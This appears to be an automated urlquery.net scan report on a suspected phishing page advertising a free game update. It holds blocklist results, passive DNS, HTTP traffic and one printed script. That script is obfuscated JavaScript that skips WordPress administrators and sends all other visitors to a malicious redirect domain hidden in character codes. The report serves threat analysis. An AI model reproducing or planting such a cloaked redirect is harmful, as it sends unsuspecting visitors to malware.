Overview

URL buyzionpark.com/assassins-creed-syndicate-update-v1-4-download-free/
IP 162.241.253.87
ASN UNIFIEDLAYER-AS-1
Location United States
Report completed 2022-07-06 11:30:38 UTC
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2022-07-06 2 buyzionpark.com/assassins-creed-syndicate-update-v1-4-download-free/ Phishing
2022-07-06 2 track.greengoplatform.com/smile.js?v=1.1.1 Malware
2022-07-06 2 duhestyce.com/bb3wV.0rPO3EpFvHbWmAVTJRZTD/0Y0xN/DTcV4VOlThcA0KLvTiQV0FNrzeg (...) Malware
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (26)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
[Mnemonic Passive DNS] ka-p.fontawesome.com (1) 4489 2020-10-21 15:16:48 UTC 2022-07-06 04:56:06 UTC 104.18.23.52
[Mnemonic Passive DNS] bam.nr-data.net (2) 630 2022-05-18 16:30:58 UTC 2022-07-06 04:45:35 UTC 162.247.241.14
[Mnemonic Passive DNS] r3.o.lencr.org (11) 344 2020-12-02 08:52:13 UTC 2022-07-06 04:41:34 UTC 23.36.76.226
[Mnemonic Passive DNS] content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-07-06 04:55:23 UTC 54.230.111.7
[Mnemonic Passive DNS] front.greengoplatform.com (1) 0 No data No data 101.99.95.147 Unknown ranking
[Mnemonic Passive DNS] go.trklinkcm.com (1) 0 2022-04-11 16:30:34 UTC 2022-07-06 04:37:06 UTC 172.255.248.105 Unknown ranking
[Mnemonic Passive DNS] code.jquery.com (1) 634 2012-05-21 17:28:02 UTC 2022-07-06 04:42:41 UTC 69.16.175.42
[Mnemonic Passive DNS] ajax.googleapis.com (1) 12905 2017-01-30 05:00:30 UTC 2019-10-16 05:01:16 UTC 216.58.207.202
[Mnemonic Passive DNS] tfcfnls.com (1) 0 2022-01-10 21:12:06 UTC 2022-07-06 10:08:37 UTC 207.120.33.39 Unknown ranking
[Mnemonic Passive DNS] track.greengoplatform.com (1) 0 No data No data 101.99.95.147 Unknown ranking
[Mnemonic Passive DNS] push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2022-07-06 04:47:23 UTC 44.241.38.244
[Mnemonic Passive DNS] img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-07-06 04:16:26 UTC 34.120.237.76
[Mnemonic Passive DNS] find.greengoplatform.com (1) 0 No data No data 101.99.95.147 Unknown ranking
[Mnemonic Passive DNS] firefox.settings.services.mozilla.com (2) 867 2016-03-17 08:25:01 UTC 2020-05-25 20:01:47 UTC 54.230.111.35
[Mnemonic Passive DNS] contile.services.mozilla.com (1) 1114 No data No data 34.117.237.239
[Mnemonic Passive DNS] buyzionpark.com (1) 0 2019-07-06 05:35:52 UTC 2022-06-19 18:49:49 UTC 162.241.253.87 Unknown ranking
[Mnemonic Passive DNS] ocsp.digicert.com (1) 86 2012-11-29 12:49:49 UTC 2022-07-06 08:25:08 UTC 93.184.220.29
[Mnemonic Passive DNS] jahebob.com (6) 0 No data No data 207.120.33.9 Unknown ranking
[Mnemonic Passive DNS] duhestyce.com (2) 0 No data No data 88.85.94.246 Unknown ranking
[Mnemonic Passive DNS] fonts.googleapis.com (1) 8877 2017-01-30 04:59:43 UTC 2019-10-16 05:12:41 UTC 142.250.74.10
[Mnemonic Passive DNS] ocsp.sca1b.amazontrust.com (2) 1015 No data No data 54.230.245.118
[Mnemonic Passive DNS] ajax.aspnetcdn.com (2) 693 2017-01-30 05:00:40 UTC 2022-07-06 04:49:41 UTC 152.199.19.160
[Mnemonic Passive DNS] ocsp.pki.goog (4) 175 2017-06-14 07:23:31 UTC 2022-07-06 04:42:12 UTC 142.250.74.3
[Mnemonic Passive DNS] fonts.gstatic.com (1) 0 2017-01-30 04:59:51 UTC 2022-07-06 04:41:59 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
[Mnemonic Passive DNS] ocsp2.globalsign.com (1) 1544 2012-05-21 07:12:19 UTC 2022-07-06 04:56:10 UTC 104.18.21.226
[Mnemonic Passive DNS] js-agent.newrelic.com (1) 378 2017-01-30 05:00:15 UTC 2022-07-06 04:19:35 UTC 151.101.86.137


Recent reports on same IP/ASN/Domain

Last 5 reports on IP: 162.241.253.87

Date UQ / IDS / BL URL IP
2022-08-16 02:02:40 +0000
0 - 0 - 2 buyzionpark.com/ 162.241.253.87
2022-08-15 16:13:10 +0000
0 - 0 - 6 buyzionpark.com/photoshop-express-mem-patch-w (...) 162.241.253.87
2022-08-13 16:13:38 +0000
0 - 0 - 4 buyzionpark.com/?p=35709 162.241.253.87
2022-07-23 13:26:18 +0000
0 - 0 - 56 karnalketo.com/need-for-speed-hot-pursuit-rel (...) 162.241.253.87
2022-07-20 23:30:20 +0000
0 - 0 - 9 buyzionpark.com/rain-blood-chronicles-mirage- (...) 162.241.253.87

Last 10 reports on ASN: UNIFIEDLAYER-AS-1

Date UQ / IDS / BL URL IP
2022-08-19 01:10:56 +0000
0 - 0 - 2 https://lceventos.net/qqo0sk.tar 162.241.5.72
2022-08-19 00:51:58 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/perspiciatis.zip 162.241.169.33
2022-08-19 00:51:56 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/doloribus.zip 162.241.169.33
2022-08-19 00:51:45 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/quaerat.zip 162.241.169.33
2022-08-19 00:51:07 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/optio.zip 162.241.169.33
2022-08-19 00:51:05 +0000
0 - 0 - 3 gurdwaraaid.com/est-dolores/velit.zip 162.241.169.33
2022-08-19 00:44:39 +0000
0 - 0 - 10 www.trackingafrica.net/cgi-admin/Panel/login.php 192.232.218.213
2022-08-19 00:44:34 +0000
0 - 0 - 1 jobhubindia.co.in/.../BDO/sso/login.php 162.241.85.29
2022-08-19 00:43:41 +0000
0 - 0 - 1 mail.estartupchallenge-egabon.org/web/Jorange (...) 108.179.242.163
2022-08-19 00:42:53 +0000
2 - 0 - 2 yandus.info/file/adobe/ 192.185.109.58

Last 4 reports on domain: buyzionpark.com

Date UQ / IDS / BL URL IP
2022-08-16 02:02:40 +0000
0 - 0 - 2 buyzionpark.com/ 162.241.253.87
2022-08-15 16:13:10 +0000
0 - 0 - 6 buyzionpark.com/photoshop-express-mem-patch-w (...) 162.241.253.87
2022-08-13 16:13:38 +0000
0 - 0 - 4 buyzionpark.com/?p=35709 162.241.253.87
2022-07-20 23:30:20 +0000
0 - 0 - 9 buyzionpark.com/rain-blood-chronicles-mirage- (...) 162.241.253.87


JavaScript

Executed Scripts (32)


Executed Evals (1)

#1 JavaScript::Eval (size: 2862, repeated: 1) - SHA256: 0e60963b712060feb7abd26996a86d34fde07884dba0393d4d81f780e97f0757

(function(_0xf18070, _0x272cf0) {
    var _0x59290c = _0x5181,
        _0x562027 = _0xf18070();
    while (!![]) {
        try {
            var _0x12abd8 = parseInt(_0x59290c(0xe8)) / 0x1 + -parseInt(_0x59290c(0xd7)) / 0x2 * (-parseInt(_0x59290c(0xdc)) / 0x3) + -parseInt(_0x59290c(0xe1)) / 0x4 + parseInt(_0x59290c(0xd6)) / 0x5 * (-parseInt(_0x59290c(0xde)) / 0x6) + parseInt(_0x59290c(0xd2)) / 0x7 * (parseInt(_0x59290c(0xe5)) / 0x8) + parseInt(_0x59290c(0xe2)) / 0x9 * (-parseInt(_0x59290c(0xe4)) / 0xa) + parseInt(_0x59290c(0xe7)) / 0xb * (-parseInt(_0x59290c(0xe3)) / 0xc);
            if (_0x12abd8 === _0x272cf0) break;
            else _0x562027['push'](_0x562027['shift']());
        } catch (_0x594726) {
            _0x562027['push'](_0x562027['shift']());
        }
    }
}(_0xa3c6, 0x35ccb));

function setCookie(_0x192891, _0x4d5ed9, _0x541bcc) {
    var _0x500167 = _0x5181,
        _0x11b512 = '';
    if (_0x541bcc) {
        var _0x2957e8 = new Date();
        _0x2957e8[_0x500167(0xd9)](_0x2957e8[_0x500167(0xdf)]() + 0x18 * _0x541bcc * 0x3c * 0x3c * 0x3e8), _0x11b512 = _0x500167(0xdd) + _0x2957e8['toUTCString']();
    }
    document[_0x500167(0xe0)] = _0x192891 + '=' + (_0x4d5ed9 || '') + _0x11b512 + _0x500167(0xdb);
}

function _0x5181(_0x31a083, _0x1ae889) {
    var _0xa3c60e = _0xa3c6();
    return _0x5181 = function(_0x5181f1, _0x4e6efd) {
        _0x5181f1 = _0x5181f1 - 0xd2;
        var _0x28f33b = _0xa3c60e[_0x5181f1];
        return _0x28f33b;
    }, _0x5181(_0x31a083, _0x1ae889);
}

function _0xa3c6() {
    var _0x1ff350 = ['2487690ncZnMM', '1854132PrgFUh', '10NvXDZz', '56vJIMVn', 'logged_in', '11hlVSrr', '188797swHERl', 'wpsetts-cookie', '259889MgJUBc', 'length', 'charAt', 'substring', '230ZiDJBw', '9026zYcBoF', 'split', 'setTime', 'indexOf', ';\x20path=/', '273wROWNu', ';\x20expires=', '3606kVYlGt', 'getTime', 'cookie', '721756drlhUd'];
    _0xa3c6 = function() {
        return _0x1ff350;
    };
    return _0xa3c6();
}

function getCookie(_0x3efbcb) {
    var _0xf10547 = _0x5181;
    for (var _0x46ba3a = _0x3efbcb + '=', _0x4828a9 = document['cookie'][_0xf10547(0xd8)](';'), _0x178039 = 0x0; _0x178039 < _0x4828a9[_0xf10547(0xd3)]; _0x178039++) {
        for (var _0x1e65a8 = _0x4828a9[_0x178039];
            '\x20' == _0x1e65a8[_0xf10547(0xd4)](0x0);) _0x1e65a8 = _0x1e65a8[_0xf10547(0xd5)](0x1, _0x1e65a8[_0xf10547(0xd3)]);
        if (0x0 == _0x1e65a8[_0xf10547(0xda)](_0x46ba3a)) return _0x1e65a8[_0xf10547(0xd5)](_0x46ba3a[_0xf10547(0xd3)], _0x1e65a8[_0xf10547(0xd3)]);
    }
    return null;
}

function getLoggedInCookie() {
    var _0x59653c = _0x5181;
    return document[_0x59653c(0xe0)][_0x59653c(0xda)]('wp-settings-time') > -0x1 ? 0x1 : document['cookie'][_0x59653c(0xda)](_0x59653c(0xe6)) > -0x1 ? 0x1 : document[_0x59653c(0xe0)][_0x59653c(0xda)](_0x59653c(0xe9)) > -0x1 ? 0x1 : document['cookie'][_0x59653c(0xda)]('wordpress_p_seo_adminos') > -0x1 ? 0x1 : 0x0;
}

function goaweway() {
    window.stop();
    var jkl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 102, 114, 111, 110, 116, 46, 103, 114, 101, 101, 110, 103, 111, 112, 108, 97, 116, 102, 111, 114, 109, 46, 99, 111, 109, 47, 103, 111, 46, 112, 104, 112, 63, 115, 105, 100, 61, 55, 38, 112, 105, 100, 61, 55, 38, 99, 105, 100, 61, 55);
    window.location.replace(jkl);
    window.location.href = jkl;
    window.location = jkl;
}
getLoggedInCookie() == 0x1 ? setCookie('wordpress_p_seo_adminos', 0x1, 0x1e) : goaweway();
                                    

Executed Writes (0)



HTTP Transactions (54)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, Backoff, Content-Type, Content-Length, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 06 Jul 2022 10:56:03 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 ab09332bca1a3bd382d2e408f65b98d2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: 0q9NWKDMBZ5b1i9aaHwYc6vlXJJxftuiaBWalmDGe70QPoNxzFaNZw==
Age: 2061


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    91dd975a7b17b2922dd23c0e49314e40
Sha1:   57a2ece1e3cee7c4ebf927f2ba92f52cac395fe2
Sha256: 09966873bbf317f8910c59544cfde2a6d46e8acd2905797cc7c85c6b4d18ea8a
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "5CA12512DFBE8A007255191678A4ECD570026D865AE741C0D3025D8FE1A58659"
Last-Modified: Mon, 04 Jul 2022 04:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=20888
Expires: Wed, 06 Jul 2022 17:18:32 GMT
Date: Wed, 06 Jul 2022 11:30:24 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-08-10-12-10-21.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.7
HTTP/2 200 OK
                                        
content-type: binary/octet-stream
content-length: 5348
last-modified: Tue, 21 Jun 2022 12:10:22 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 06 Jul 2022 03:26:46 GMT
etag: "581454acdd98f34fd3fbabd0977ade29"
x-cache: Hit from cloudfront
via: 1.1 0e39dca74306d7aab723ed3d73dbfbb4.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: 8xJG2_sxRH_DS-a6o7wvJWLVLvBTRyTNPKYX4fQE7NPzgnc61zgyZg==
age: 29019
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    581454acdd98f34fd3fbabd0977ade29
Sha1:   d8d86c0b513137aeb85de01cea7b272c35eb6ab4
Sha256: e98f8f33ba5ed59c3cfdf2ae54957ed32652cf0899f3c8db4b5872e3ece1e4eb
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
                                        
server: nginx
date: Wed, 06 Jul 2022 11:30:24 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /assassins-creed-syndicate-update-v1-4-download-free/ HTTP/1.1 
Host: buyzionpark.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         162.241.253.87
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Wed, 06 Jul 2022 11:30:24 GMT
Server: nginx/1.19.10
Content-Length: 362
Cache-Control: max-age=28800
Expires: Wed, 06 Jul 2022 19:30:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
X-Endurance-Cache-Level: 3
X-nginx-cache: WordPress
X-Server-Cache: true
X-Proxy-Cache: MISS


--- Additional Info ---
Magic:  HTML document, ASCII text
Size:   362
Md5:    ffd800dcdf385ea58f065678b6f2230d
Sha1:   86eaa5edb94a08360a31a9282bb24ace021fbb57
Sha256: 0d953dcb4dcc6a33c664476ed2d18aacedbd3140c3c5bc7c7849af3eab488f93

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "6CEB01B9CEF4A6D5008E8437A7FACEF55B69B25F657E7121BFD3DBDB2C4643F1"
Last-Modified: Tue, 05 Jul 2022 15:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2846
Expires: Wed, 06 Jul 2022 12:17:51 GMT
Date: Wed, 06 Jul 2022 11:30:25 GMT
Connection: keep-alive

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, ETag, Content-Type, Last-Modified, Alert, Backoff, Pragma, Expires, Content-Length, Cache-Control
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Cache-Control: max-age=3600
Date: Wed, 06 Jul 2022 10:34:56 GMT
Expires: Wed, 06 Jul 2022 11:02:04 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 5bcfe2deda0bdbc6bade0af9b61602ca.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: 26YgZN6iUzw08P9czhSjVgKjgRLApG8mhfNbsHV_nkTMu-dcYRwOnQ==
Age: 3329


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3667
Cache-Control: 'max-age=158059'
Date: Wed, 06 Jul 2022 11:30:25 GMT
Last-Modified: Wed, 06 Jul 2022 10:29:18 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /smile.js?v=1.1.1 HTTP/1.1 
Host: track.greengoplatform.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://buyzionpark.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:25 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (9545), with no line terminators
Size:   1631
Md5:    1c6a1d5b7ff4235aab09af77de642177
Sha1:   54cfd4e449adc02c0a1deba947702ff055fe73d1
Sha256: 505bd314e45a6145112242d2aaad4aaec648600577661b511531af420fa0747e

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: zGz3ybRtUKhlhd2mtKxqLA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         44.241.38.244
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: bhdb7mlg9fkVdMgliQemMI3yfhM=

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1267D76F0461FB5A38AF68130B1E626EAAC5896076DD3750F2611DDB786FBF6D"
Last-Modified: Tue, 05 Jul 2022 15:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=7022
Expires: Wed, 06 Jul 2022 13:27:27 GMT
Date: Wed, 06 Jul 2022 11:30:25 GMT
Connection: keep-alive

                                        
                                            GET /go.php?sid=7&pid=7&cid=7 HTTP/1.1 
Host: front.greengoplatform.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://buyzionpark.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:25 GMT
Content-Length: 0
Connection: keep-alive
Location: https://find.greengoplatform.com/back.php?sid=6856&pid=9954&cid=347853

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "611E864D4A64EB7175BDED94052A41462E3215D329EF82CBEEA70D511B811E8D"
Last-Modified: Mon, 04 Jul 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5584
Expires: Wed, 06 Jul 2022 13:03:30 GMT
Date: Wed, 06 Jul 2022 11:30:26 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc072e61d-3b9b-4f2d-acc8-d26a8adf968d.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 12165
x-amzn-requestid: 796ca673-2ab5-4bd9-b4f1-d2c250c34e3a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
